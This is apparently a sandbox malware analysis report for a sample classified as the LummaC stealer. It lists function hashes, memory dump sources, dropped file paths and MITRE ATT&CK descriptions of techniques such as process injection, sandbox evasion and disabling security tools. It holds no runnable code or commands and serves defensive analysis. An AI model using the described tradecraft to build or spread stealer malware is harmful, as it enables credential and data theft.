Instruction Fuzzy Hash: F641156450C3C59BE7368F2A98B07B7BBD4DFA6304F28486DE4DA8B242D6304905C752

Function 009F7D00 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b1961df519d3a992748648e8ee7d974e61fef245515eeaee02f4cd07f6eaa84
Instruction ID: 1d772745858e0f31c15ca061fd1d3ce9af3c65b8ef3cce95b78bba98cfbbac9f
Opcode Fuzzy Hash: 1b1961df519d3a992748648e8ee7d974e61fef245515eeaee02f4cd07f6eaa84
Instruction Fuzzy Hash: F94129B2A0830C5BE710AE94DC81B7BF7EAEF85704F14082CF68593251E635ED158796

Function 009F7EA0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction ID: 42359168281efc23249cee21837e2ae1688d32b68b230e1ee53b0561c1541b30
Opcode Fuzzy Hash: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction Fuzzy Hash: F941E473A196144BD348CE798C4027BBA936BD5330F2ECB3DEAB5973D5DA7988058381

Function 009FF040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7de8549579dd19158596ace1bdf4977282e6f40028bba5575e0eda83df684361
Instruction ID: a7c528c453cb1330ed33b658cec5843bc5cc70e9fa57e37118ac604273dce802
Opcode Fuzzy Hash: 7de8549579dd19158596ace1bdf4977282e6f40028bba5575e0eda83df684361
Instruction Fuzzy Hash: 2441E17170930CEFE724CE65DCE1B76B3AAEB89718F28852CE2C597251CA74B812C745

Function 009FB46A Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c66de38f112d571a7452e8991c67538e2096b190d27daee221e6549e13dda78
Instruction ID: f291fa18e190a2db5a3ba21a7158b86aa25283a7a4788f3a0107d0742edb9d21
Opcode Fuzzy Hash: 8c66de38f112d571a7452e8991c67538e2096b190d27daee221e6549e13dda78
Instruction Fuzzy Hash: CF4168B1A106069BCB08CF78DC616BDBBE3FB95300B18822CD112E73A5EB786556CB44

Function 009D6D52 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9913de447947e2292325f30972ad89f685d182889d7a57f5fa093976a5b8d049
Instruction ID: 16418ab0f636ccd01ef519abacbf6c5433dab26d7174c6dd9a229cf1f989345c
Opcode Fuzzy Hash: 9913de447947e2292325f30972ad89f685d182889d7a57f5fa093976a5b8d049
Instruction Fuzzy Hash: AC11B1B5B9C2058BD728CF75D8811277792FBE9319F28C52DC1CA93311EA398C578B06

Function 009C8A20 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
Instruction ID: cf0844cdef733ec0f9d8153d3f83392c9dde465936b7e8438b30621f5460ec03
Opcode Fuzzy Hash: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
Instruction Fuzzy Hash: 0421FB77E619204BE310CD56CC807527796A7C9338F3EC6B8C9689B392D93BAD0386C4

Function 009FBCDB Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a732096779598e962337c17e30a805aa3e434edff5993094c795aabefd6df67
Instruction ID: 1eb6a228bed7ad3497478742ad37f0449602b3c09df923f6f2cc979af70dc6bf
Opcode Fuzzy Hash: 8a732096779598e962337c17e30a805aa3e434edff5993094c795aabefd6df67
Instruction Fuzzy Hash: 11110372E146158BCB18CF69C8512BAB7B2AB95300B19C155C955A7308E738AC13CBD4

Function 009D9605 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77ef0501ef9ff47118baadc3a3de9095ddf139c57b53b6471064e958a1d54f05
Instruction ID: 9273914dc8fac1d2dbcd2139ba5653fe18af25f7c6ddd2ca7836a27302e542f4
Opcode Fuzzy Hash: 77ef0501ef9ff47118baadc3a3de9095ddf139c57b53b6471064e958a1d54f05
Instruction Fuzzy Hash: A021923164D7508BC7AADB24E4912ABB396BBD9714F19863EC8CB43320CB319C43C785

Function 009E8640 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5142074579e547da28140aabf8be2128520d15b89af42f08bc3ad1bf51a9ede
Instruction ID: be366c3bd8f9060aae83b1b7b0deda7f12a50b64995800c33b0e5339dd1e74bb
Opcode Fuzzy Hash: b5142074579e547da28140aabf8be2128520d15b89af42f08bc3ad1bf51a9ede
Instruction Fuzzy Hash: 6601F135909254EFCB198F91D84143BFBF5EB8AB14F15986CE08663252CB39EC078B86

Function 009E9DA0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction ID: 77aa28fd595992f041c67b8406c884472f108f81a6e4957f43f4052e890f1c88
Opcode Fuzzy Hash: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction Fuzzy Hash: 3E01B1F1A0035147DB21DE52D8C0B2BF2AC6F85704F08082CE90547342EB72EC14C692

Function 009D46C0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction ID: f84e45f9a6855fa9bacb013314f60b88cd0a119b67625a4817641204c9d35604
Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction Fuzzy Hash: DA01D67BA423128B8324CE5CC4D06ABB3B4FF96795B2A945ED5815F370D7319D15C260

Function 009E10F3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc9123f1c4bc1a971897bb85949e73c4d1ad90dafaee212520e00689efce53d2
Instruction ID: 4bfa2a13a01fe83a86333bb10fbc2c6e1ffdf8d808fa33ba0227cf002e7ee437
Opcode Fuzzy Hash: cc9123f1c4bc1a971897bb85949e73c4d1ad90dafaee212520e00689efce53d2
Instruction Fuzzy Hash: F9B092F5C0A4108698116A903D42BAAF0681A53204F08243CE80622206FA16E21B889F

Function 009E34B7 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 246COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 009E3606

Strings

xs, xrefs: 009E34FC
uw, xrefs: 009E3503
pz, xrefs: 009E376E, 009E34A8
pz, xrefs: 009E36BA

Memory Dump Source

Source File: 00000001.00000002.2954673684.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000001.00000002.2954657445.00000000009C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954709259.0000000000A00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954727428.0000000000A03000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954745031.0000000000A07000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2954762259.0000000000A11000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9c0000_LummaC2.jbxd

Similarity

API ID: DrivesLogical
String ID: pz$pz$uw$xs
API String ID: 999431828-3977666006
Opcode ID: 96521cd8f9d4726ea82201850052f5323d68cdc938af23f21dd8079d9e7114f4
Instruction ID: b9e784bb38a6d69cd2d6f9f03113f98d9699496fc2a66df0c24795f01fb7663f
Opcode Fuzzy Hash: 96521cd8f9d4726ea82201850052f5323d68cdc938af23f21dd8079d9e7114f4
Instruction Fuzzy Hash: 208102B5D01206CFCB15DF65D891AAABBB0FF5A304B4992A8D445AF322E734D942CFC1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 3stIhG821a.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3stIhG821a.exe.log

C:\Users\user\AppData\Local\Temp\LummaC2.exe

C:\Users\user\AppData\Local\Temp\Set-up.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
3stIhG821a.exe

Function 009F5135 Relevance: 65.4, Strings: 52, Instructions: 388
COMMON

Function 009C8720 Relevance: 7.7, APIs: 5, Instructions: 235
threadCOMMON

Function 009FBAD0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 009FC59C Relevance: 1.3, Strings: 1, Instructions: 70
COMMON

Function 009FEEC0 Relevance: .1, Instructions: 141
COMMON

Function 009FBC91 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 009FA080 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Function 009F483C Relevance: 34.0, Strings: 27, Instructions: 298
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre